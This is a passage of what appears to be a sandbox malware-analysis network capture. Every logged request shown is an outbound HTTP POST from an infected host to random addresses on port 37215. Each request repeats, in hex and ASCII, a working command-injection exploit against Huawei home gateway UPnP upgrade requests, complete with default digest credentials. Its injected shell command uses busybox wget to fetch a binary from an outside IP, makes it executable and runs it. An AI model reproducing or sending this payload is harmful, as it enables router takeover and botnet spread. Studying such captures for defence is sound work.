                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2319192.168.2.1547300138.182.212.23537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468065977 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2320192.168.2.1558036197.154.124.24237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468079090 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2321192.168.2.1549440219.192.210.11137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468343973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2322192.168.2.1556048157.110.102.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468394041 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2323192.168.2.1556808138.165.206.9537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468424082 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2324192.168.2.154797631.109.144.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468439102 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2325192.168.2.1554084156.194.192.4637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468470097 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2326192.168.2.1536550181.120.254.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468487978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2327192.168.2.1545670138.221.183.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468489885 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2328192.168.2.1560316181.17.160.937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.468628883 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
